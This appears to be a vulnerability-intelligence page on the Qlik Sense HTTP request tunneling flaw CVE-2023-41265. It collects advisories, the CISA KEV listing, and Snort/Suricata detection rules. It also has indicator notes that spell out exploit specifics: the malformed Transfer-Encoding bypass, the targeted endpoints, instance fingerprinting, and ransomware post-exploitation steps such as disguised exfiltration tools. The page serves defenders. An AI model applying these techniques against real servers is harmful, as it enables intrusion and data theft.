CVE-2023-41265
published 2023-08-29CVE-2023-41265: An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and…
PriorityP198critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2023-12-28
Exploited in the wild
EPSS
84.97%
99.7th percentile
An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
| qlik | qlik_sense | — | — |
Detection & IOCsextracted from sources · hover to see the quote
path/resources/qmc/fonts/CVE-2023-41265.ttf
path/resources/qmc/fonts/
path/qrs/
snort
alert http1 any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)"; flow:established,to_server; content:"POST /qrs/"; pcre:"/^(?:ExternalProgramTask\x2fcreate|user)/R"; content:"|3f|xrfkey|3d|"; within:50; content:"X-Qlik-xrfkey|3a 20|"; nocase; distance:0; content:"X-Qlik-user|3a 20|"; distance:0; nocase; http.method; content:"HEAD"; http.cookie; content:"X-Qlik-Session|3d|"; http.header_names; content:"|0d 0a|X-Qlik-Xrfkey|0d 0a|"; fast_pattern; http.header; content:"Transfer-Encoding|3a 20 2c 09|chunked|2c 0d 0a|"; reference:url,www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-48365; classtype:attempted-admin; sid:2059793; rev:1;)
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.uri.raw; content:"/resources/qmc/fonts/"; startswith; content:".ttf"; endswith; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-41266; classtype:web-application-attack; sid:2048366; rev:1;)
snort
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.content_len; bsize:1; content:"0"; endswith; http.request_body; bsize:>0; reference:url,praetorian.com/blog/qlik-sense-technical-exploit/; reference:cve,2023-41265; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; classtype:web-application-attack; sid:2048365; rev:3;)
bytes
Transfer-Encoding: ,\x09chunked
- →HTTP Request Tunneling exploit sends a POST request with header 'X-Qlik-' present, Content-Length of exactly 1 byte set to '0', but a non-empty request body — indicating a smuggled/tunneled inner request
- →Tunneling bypass (CVE-2023-48365 / DoubleQlik) uses a malformed Transfer-Encoding header value of ', \x09chunked' (comma + tab before 'chunked') to evade the original patch
- →Exploit targets /qrs/ endpoints, specifically ExternalProgramTask/create or user paths, with HEAD method tunneled inside, and X-Qlik-Session cookie present
- →Path traversal component of the chained attack (CVE-2023-41266) uses POST requests to /resources/qmc/fonts/*.ttf URIs with X-Qlik- headers; discovery command output is redirected into .TTF files
- →Post-exploitation: attackers use BITS (Background Intelligent Transfer Service) and PowerShell to download tools; rclone is disguised as svchost.exe for data exfiltration; Plink renamed to putty.exe for RDP tunneling ↗
- →Shodan/FOFA fingerprinting: Qlik Sense instances can be identified by favicon hash -74348711, HTML containing 'Qlik', or title 'qlik-sense'
- →Nuclei probe expects HTTP 400 response with Set-Cookie header containing 'x-qlik-session' and 'Bad Request' in response headers as confirmation of vulnerable tunneling behavior
- →Cactus ransomware uses ManageEngine UEMS executables disguised as Qlik files for persistence after exploiting CVE-2023-41265 ↗
- →Attackers uninstall Sophos antivirus and change the administrator password as defense evasion steps following initial exploitation ↗
- ·The Snort rule for CVE-2023-48365 (sid:2059793) requires TLS decryption (tls_state TLSDecrypt / deployment SSLDecrypt) to be effective in encrypted traffic environments.
- ·The Nuclei template uses 'unsafe: true' mode to send a raw HTTP/1.1 request with both Content-Length and Transfer-Encoding headers simultaneously, which standard HTTP clients would reject — ensure the scanner supports unsafe raw request mode.
CVSS provenance
nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vulncheck9.6CRITICAL
cisa9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-2cxf-f44j-gqqf: Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683
ghsa_unreviewed·2023-11-16·CVSS 9.6
CVE-2023-48365 [CRITICAL] CWE-444 GHSA-2cxf-f44j-gqqf: Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683
Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683. Due to improper validation of HTTP headers, a remote attacker is able to elevate their privilege by tunneling HTTP requests, allowing them to execute HTTP requests on the backend server that hosts the repository application. The fixed versions are August 2023 Patch 2, May 2023 Patch 6, February 2023 Patch 10, November 2022 Patch 12, August 2022 Patch 14, May 2022 Patch 16, February 2022 Patch 15, and November 2021 Patch 17. NOTE: this issue exists because of an incomplete fix for CVE-2023-41265.
GHSA
GHSA-h5r5-8fxj-m5cm: An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 an
ghsa_unreviewed·2023-08-30
CVE-2023-41265 [CRITICAL] CWE-444 GHSA-h5r5-8fxj-m5cm: An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 an
An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
VulnCheck
Qlik Sense HTTP Tunneling Vulnerability
vulncheck·2023·CVSS 9.6
CVE-2023-41265 [CRITICAL] CWE-444 Qlik Sense HTTP Tunneling Vulnerability
Qlik Sense HTTP Tunneling Vulnerability
Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.
Affected: Qlik Sense
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2023-41265; https://dashboard.shadowserver.org
CISA
Qlik Sense HTTP Tunneling Vulnerability
cisa·2023-12-07·CVSS 9.9
CVE-2023-41265 [CRITICAL] CWE-444 Qlik Sense HTTP Tunneling Vulnerability
Vulnerability: Qlik Sense HTTP Tunneling Vulnerability
Affected: Qlik Sense
Qlik Sense contains an HTTP tunneling vulnerability that allows an attacker to escalate privileges and execute HTTP requests on the backend server hosting the software.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Notes: https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801; https://nvd.nist.gov/vuln/detail/CVE-2023-41265
Remediation Due Date: 2023-12-28
Suricata
ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)
suricata·2025-01-31·CVSS 9.6
CVE-2023-48365 [CRITICAL] ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)
ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)
Rule: alert http1 any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Qlik Sense Enterprise HTTP Request Tunneling Attempt (CVE-2023-48365)"; flow:established,to_server; content:"POST /qrs/"; pcre:"/^(?:ExternalProgramTask\x2fcreate|user)/R"; content:"|3f|xrfkey|3d|"; within:50; content:"X-Qlik-xrfkey|3a 20|"; nocase; distance:0; content:"X-Qlik-user|3a 20|"; distance:0; nocase; http.method; content:"HEAD"; http.cookie; content:"X-Qlik-Session|3d|"; http.header_names; content:"|0d 0a|X-Qlik-Xrfkey|0d 0a|"; fast_pattern; http.header; content:"Transfer-Encoding|3a 20 2c 09|chunked|2c 0d 0a|"; reference:url,www.praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve
Suricata
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)
suricata·2023-09-29·CVSS 8.2
CVE-2023-41266 [HIGH] ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via Path Traversal (CVE-2023-41266)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.uri.raw; content:"/resources/qmc/fonts/"; startswith; content:".ttf"; endswith; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-41266; classtype:web-application-attack; sid:2048366; rev:1; metadata:affected_product Qlik_Sense_Enterprise, created_at 2023_09_29, cve CVE_2023_41266, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generate
Suricata
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)
suricata·2023-09-29·CVSS 9.6
CVE-2023-41265 [CRITICAL] ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling Payload (CVE-2023-41265)"; flow:established,to_server; http.method; content:"POST"; http.header; content:"X-Qlik-"; fast_pattern; http.content_len; bsize:1; content:"0"; endswith; http.request_body; bsize:>0; reference:url,praetorian.com/blog/qlik-sense-technical-exploit/; reference:cve,2023-41265; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; classtype:web-application-attack; sid:2048365; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Qlik_Sense_Enterprise, attack_target Cli
Suricata
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling with Malformed Transfer-Encoding (CVE-2023-41265)
suricata·2023-09-29·CVSS 9.6
CVE-2023-41265 [CRITICAL] ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling with Malformed Transfer-Encoding (CVE-2023-41265)
ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling with Malformed Transfer-Encoding (CVE-2023-41265)
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET WEB_SPECIFIC_APPS Possible DoubleQlik RCE via HTTP Request Tunneling with Malformed Transfer-Encoding (CVE-2023-41265)"; flow:established,to_server; app-layer-event:http.invalid_transfer_encoding_value_in_request; http.cookie; content:"X-Qlik-Session="; fast_pattern; reference:url,praetorian.com/blog/doubleqlik-bypassing-the-original-fix-for-cve-2023-41265/; reference:cve,2023-41265; classtype:web-application-attack; sid:2048367; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, affected_product Qlik_Sense_Enterprise, attack_target Client_Endpoint, created_at 2023_09_29, cve CVE_2023_
Nuclei
Qlik Sense Enterprise - HTTP Request Smuggling
nuclei·CVSS 9.9
CVE-2023-41265 [CRITICAL] Qlik Sense Enterprise - HTTP Request Smuggling
Qlik Sense Enterprise - HTTP Request Smuggling
An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
Template:
id: CVE-2023-41265
info:
name: Qlik Sense Enterprise - HTTP Request Smuggling
author: AdamCrosser
severity: critical
description: |
An HTTP Request Tunneling vulnerabi
Bleepingcomputer
Magnet Goblin hackers use 1-day flaws to drop custom Linux malware
blogs_bleepingcomputer·2024-03-09·CVSS 9.8
[CRITICAL] Magnet Goblin hackers use 1-day flaws to drop custom Linux malware
## Magnet Goblin hackers use 1-day flaws to drop custom Linux malware
## Bill Toulas
A financially motivated hacking group named Magnet Goblin uses various 1-day vulnerabilities to breach public-facing servers and deploy custom malware on Windows and Linux systems.
1-day flaws refer to publicly disclosed vulnerabilities for which a patch has been released. Threat actors looking to exploit these flaws must do so quickly before a target can apply security updates.
Though exploits are usually not made available immediately upon a flaw's disclosure, some vulnerabilities are trivial to figure out how to leverage. Additionally, reverse-engineering the patch may reveal the underlying problem and how to exploit it.
Check Point analysts who identified Magnet Goblin report that these threat act
Checkpoint
Magnet Goblin Targets Publicly Facing Servers Using 1-Day Vulnerabilities
blogs_checkpoint·2024-03-08·CVSS 4.9
CVE-2024-21887 [MEDIUM] Magnet Goblin Targets Publicly Facing Servers Using 1-Day Vulnerabilities
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## Magnet Goblin Targets Publicly Facing Servers Using 1-Day Vulnerabilities
## Key Points
Magnet Goblin is a financially motivated threat actor that quickly adopts and leverages 1-day vuln
Bleepingcomputer
Cactus ransomware exploiting Qlik Sense flaws to breach networks
blogs_bleepingcomputer·2023-11-30·CVSS 9.6
[CRITICAL] Cactus ransomware exploiting Qlik Sense flaws to breach networks
## Cactus ransomware exploiting Qlik Sense flaws to breach networks
## Bill Toulas
Cactus ransomware has been exploiting critical vulnerabilities in the Qlik Sense data analytics solution to get initial access on corporate networks.
Qlik Sense supports multiple data sources and allows users to create custom data reports or interactive visualizations that can serve in decision making processes. The product can work both locally or in the cloud.
In late August, the vendor released security updates for two critical vulnerabilities affecting the Windows version of the platform. One of the vulnerabilities, a path traversal bug tracked as CVE-2023-41266 , could be exploited to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.
The second issue, tracked as CVE-2
https://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801https://community.qlik.com/t5/Release-Notes/tkb-p/ReleaseNoteshttps://community.qlik.com/t5/Official-Support-Articles/Critical-Security-fixes-for-Qlik-Sense-Enterprise-for-Windows/ta-p/2110801https://community.qlik.com/t5/Release-Notes/tkb-p/ReleaseNoteshttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-41265
2023-08-29
Published
2023-12-07
Added to CISA KEV
Exploited in the wild